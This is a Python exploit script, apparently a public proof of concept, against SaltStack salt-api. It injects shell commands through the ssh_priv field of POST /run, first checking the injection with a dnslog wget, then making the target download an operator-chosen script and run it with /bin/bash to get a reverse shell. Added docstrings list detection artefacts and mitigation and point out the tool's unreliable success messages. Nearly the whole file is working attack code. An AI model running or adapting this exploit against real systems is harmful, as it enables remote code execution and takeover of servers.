import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
    """Print the tool banner: author links, the claimed affected SaltStack versions,
    and the format of the interactive prompts.

    The "Version" line is the author's claim only; nothing in this script checks the
    target's actual version, so it should not be read as a confirmation of exposure.
    """
    banner = (
        '+------------------------------------------',
        '+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m',
        '+ \033[34mGithub : https://github.com/PeiQi0 \033[0m',
        '+ \033[34m公众号 : PeiQi文库 \033[0m',
        '+ \033[34mVersion: SaltStack Version < 2019.2.4 & < 3000.2 \033[0m',
        '+ \033[36m使用格式: python3 poc.py \033[0m',
        '+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m',
        '+ \033[36mDnslog >>> xxx.dnslog.cn \033[0m',
        '+ \033[36mFile_addr >>> http://xxx.xxx.xxx/cmd.sh \033[0m',
        '+ \033[36mFile_name >>> cmd.sh \033[0m',
        '+------------------------------------------',
    )
    # One write instead of eleven print() calls; output is byte-identical.
    print("\n".join(banner))
def POC_1(target_url: str, dnslog: str) -> None:
    """Stage 1 of 3: send one POST to salt-api ``/run`` whose ``ssh_priv`` field carries
    a shell fragment (``peiqi|wget http://<dnslog>``) and tell the operator to watch the
    dnslog service for the resulting lookup; on HTTP 200 with "return" in the body,
    offer to continue with POC_2.

    Args:
        target_url: base URL of the salt-api host. "/run" is appended without any
            normalisation, so a trailing slash produces "//run".
        dnslog: hostname the target is asked to fetch; it is placed verbatim in the
            request body.

    Returns:
        None. Calls ``sys.exit(0)`` on a non-matching response or when the operator
        declines the follow-up prompt; transport errors are printed, not raised.

    Defensive notes (the observable artefacts of this request):
      - POST to ``/run`` with ``client=ssh`` and a ``ssh_priv`` value containing shell
        metacharacters (``|``) rather than a key path; fixed filler values ``token=12312``,
        ``roster=whip1ash``, ``fun=a``, ``tgt=*``.
      - ``Accept: application/x-yaml`` with the Chrome User-Agent below, and an outbound
        HTTP/DNS request from the Salt host to an attacker-chosen name right afterwards.
      - Mitigation is patching salt-api (the banner's version line is the author's claim,
        not verified here) and not exposing the API to untrusted networks.
    """
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        # YAML is requested, but the success check below only looks for the word "return".
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    # Body is built by string formatting, not url-encoded: the payload relies on the
    # server treating the ssh_priv value as part of a command line (presumably — this
    # script never sees the server side). dnslog is not escaped.
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|wget http://{}".format(dnslog)
    try:
        # verify=False disables TLS certificate validation; the warning it would emit
        # is silenced on the line before.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[32m[o] 正在执行 wget http://{} \033[0m".format(dnslog))
        # Weak success heuristic: HTTP 200 plus the literal "return" anywhere in the body.
        # The real evidence is whether the dnslog service recorded a lookup.
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 请查看 Dnslog响应 \033[0m")
            # Prompt loop: "Y"/"y" runs the full stage-2/stage-3 chain (which normally
            # ends in sys.exit inside POC_3); any other answer exits with status 0.
            while True:
                Chois = input("\033[35m是否反弹 Shell(Y/N) >>> \033[0m")
                if Chois == "Y" or Chois == "y":
                    File_addr = input("\033[35mFile_addr >>> \033[0m")
                    File_name = input("\033[35mFile_name >>> \033[0m")
                    POC_2(target_url, File_addr, File_name)
                else:
                    sys.exit(0)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            # Exit status is 0 even on failure, so callers cannot distinguish outcomes.
            sys.exit(0)
    except Exception as e:
        # Catches connection errors and timeouts. SystemExit raised by the nested
        # stages is not an Exception subclass, so it passes through this handler.
        print("\033[31m[x] 请求失败 \033[0m", e)
def POC_2(target_url: str, File_addr: str, File_name: str) -> None:
    """Stage 2 of 3: repeat the stage-1 request with ``wget <File_addr>`` as the shell
    fragment so the target downloads a file, then hand off to POC_3.

    Args:
        target_url: base URL of the salt-api host; "/run" is appended unchanged.
        File_addr: URL the target is asked to download; inserted verbatim, unescaped.
        File_name: passed straight through to POC_3; not used in this request.

    Returns:
        None. ``sys.exit(0)`` on a non-matching response; transport errors are printed.

    Defensive note: identical request shape to POC_1 (POST /run, client=ssh,
    ``ssh_priv`` containing ``|``), followed by an outbound HTTP fetch from the Salt
    host to an operator-supplied URL. Same headers and filler values as POC_1.
    """
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    # Only the text after the "|" differs from POC_1; File_addr is not url-encoded.
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|wget {}".format(File_addr)
    try:
        # TLS certificate validation disabled (verify=False), warning silenced.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[32m[o] 正在执行 wget {} \033[0m".format(File_addr))
        # Same weak heuristic as POC_1: a 200 containing "return" is treated as
        # "download succeeded" without any confirmation from the target.
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 成功下载{} \033[0m".format(File_addr))
            POC_3(target_url, File_name)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            # Exit status 0 on failure, as in POC_1.
            sys.exit(0)
    except Exception as e:
        # Network errors and timeouts land here; SystemExit from POC_3 passes through.
        print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url: str, File_name: str) -> None:
    """Stage 3 of 3: repeat the request with ``/bin/bash <File_name>`` as the shell
    fragment, i.e. ask the target to run the file POC_2 had it download, then exit.

    Args:
        target_url: base URL of the salt-api host; "/run" is appended unchanged.
        File_name: path/name of the file to execute on the target; inserted verbatim.

    Returns:
        Never returns normally: every path ends in ``sys.exit(0)``.

    Defensive note: same POST /run shape as POC_1/POC_2 (client=ssh, ``ssh_priv`` with
    ``|``); the Salt host then spawns ``/bin/bash`` on a freshly downloaded file, which
    is the process-level artefact to look for. Note that this function's output is not
    reliable evidence of execution (see the except branch).
    """
    vuln_url = target_url + "/run"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "application/x-yaml",
        "Accept-Language": "en-US,en;q=0.5"
    }
    # File_name is not escaped or quoted; it is appended directly after "/bin/bash ".
    data = "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=peiqi|/bin/bash {}".format(File_name)
    try:
        # TLS certificate validation disabled (verify=False), warning silenced.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        # The two .format(File_name) calls below are no-ops: neither string has a "{}"
        # placeholder, so the file name is never shown to the operator.
        print("\033[32m[o] 正在执行 /bin/bash \033[0m".format(File_name))
        if "return" in response.text and response.status_code == 200:
            print("\033[32m[o] 命令执行完毕,请查看是否反弹Shell \033[0m".format(File_name))
            sys.exit(0)
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            # Exit status 0 on failure, consistent with the other stages.
            sys.exit(0)
    except Exception as e:
        # Misleading by design or by mistake: any exception here — including the
        # 10-second timeout or a refused connection — is reported as "command executed
        # successfully". The exception is swallowed (e is never printed), so this
        # message must not be taken as confirmation that anything ran on the target.
        print("\033[32m[o] 命令执行成功 \033[0m")
        sys.exit(0)
if __name__ == '__main__':
    # Interactive entry point: show the banner, read the two values POC_1 needs from
    # stdin (no validation or normalisation of either), and start the stage-1 request.
    # input() already returns str, so no conversion is needed.
    title()
    target_url = input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")
    dnslog = input("\033[35mDnslog >>> \033[0m")
    POC_1(target_url, dnslog)